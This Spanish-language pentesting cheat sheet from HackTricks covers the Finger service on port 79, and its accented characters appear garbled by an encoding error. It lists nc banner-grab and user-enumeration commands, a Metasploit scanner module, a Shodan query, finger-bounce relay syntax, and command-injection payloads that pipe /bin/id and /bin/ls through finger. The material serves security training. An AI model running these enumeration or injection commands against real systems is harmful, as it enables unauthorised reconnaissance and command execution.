79 - Pentesting Finger

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Informaci贸n B谩sica

El programa/servicio Finger se utiliza para recuperar detalles sobre los usuarios de computadoras. T铆picamente, la informaci贸n proporcionada incluye el nombre de inicio de sesi贸n del usuario, nombre completo, y, en algunos casos, detalles adicionales. Estos detalles adicionales podr铆an abarcar la ubicaci贸n de la oficina y el n煤mero de tel茅fono (si est谩 disponible), la hora en que el usuario inici贸 sesi贸n, el per铆odo de inactividad (tiempo inactivo), la 煤ltima vez que el correo fue le铆do por el usuario, y el contenido de los archivos de plan y proyecto del usuario.

Puerto por defecto: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeraci贸n

Captura de Banner/Conexi贸n b谩sica

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumeraci贸n de usuarios

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativamente, puedes usar finger-user-enum de pentestmonkey, algunos ejemplos:

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap ejecuta un script para hacer usando scripts predeterminados

Metasploit utiliza m谩s trucos que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Ejecuci贸n de comandos

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Usar un sistema como un relay de finger

finger user@host@victim
finger @internal@external

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks